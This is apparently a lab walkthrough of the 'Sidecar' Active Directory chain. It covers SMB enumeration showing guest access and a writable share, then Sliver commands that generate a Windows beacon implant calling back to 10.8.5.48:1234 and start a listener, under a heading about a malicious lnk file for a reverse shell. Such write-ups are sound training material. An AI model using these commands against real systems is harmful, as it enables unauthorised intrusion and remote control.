Sidecar (Chain)

PreviousIntercept (Chain)

Last updated 5 hours ago

Sidecar (Chain)

Operating System: Microsoft Windows Server 2022 Standard

Chain: True (2 Machines)

Credentials

Username

Password

Method

Scope

✅ Valid Usernames

🔑 Passwords list

Information Gathering

Nmap Scan

Service Enumeration

10.10.146.181

DNS

Not vulnerable to DNS Zone Transfer

SMB (Enum4linux-ng)

Parent/Root Domain
NetBIOS: DC01
Domain: Sidecar.vl
FQDN: DC01.Sidecar.vl
Domain SID: S-1-5-21-3976908837-939936849-1028625813
SMB signing: true (Not vulnerable to NTLM Relay)
Server allows null session authentication
Server allows guest session authentication

10.10.146.182

SMB

NetBIOS: WS01
FQDN: ws01.Sidecar.vl
SMB signing: false (vulnerable to ntlm relay)

Compromising XXXXX

User enumeration

During the enumeration the tester found that guest authentication was enabled into the server allows to enumerate the SMB shares. it was discovered that Public share allows Read and Write permissions.

❯ nxc smb 10.10.146.181 -u 'Intrusionz3r0' -p '' --shares
SMB         10.10.146.181   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:Sidecar.vl) (signing:True) (SMBv1:False)
SMB         10.10.146.181   445    DC01             [+] Sidecar.vl\Intrusionz3r0: (Guest)
SMB         10.10.146.181   445    DC01             [*] Enumerated shares
SMB         10.10.146.181   445    DC01             Share           Permissions     Remark
SMB         10.10.146.181   445    DC01             -----           -----------     ------
SMB         10.10.146.181   445    DC01             ADMIN$                          Remote Admin
SMB         10.10.146.181   445    DC01             C$                              Default share
SMB         10.10.146.181   445    DC01             IPC$            READ            Remote IPC
SMB         10.10.146.181   445    DC01             NETLOGON                        Logon server share 
SMB         10.10.146.181   445    DC01             Public          READ,WRITE      
SMB         10.10.146.181   445    DC01             SYSVOL                          Logon server share

Creating a malicious lnk file to obtain a reverse shell

sliver > generate beacon --http 10.8.5.48:1234 --os windows --arch amd64 --format exe --save /home/Intrusionz3r0/Documents/Sidecar/Content

[*] Generating new windows/amd64 beacon implant binary (1m0s)
[*] Symbol obfuscation is enabled
[*] Build completed in 31s
[*] Implant saved to /home/Intrusionz3r0/Documents/Sidecar/Content/GEOGRAPHICAL_INDEPENDENCE.exe

sliver > http --lhost 10.8.5.48 --lport 1234
[*] Starting HTTP :1234 listener ...
[*] Successfully started job #3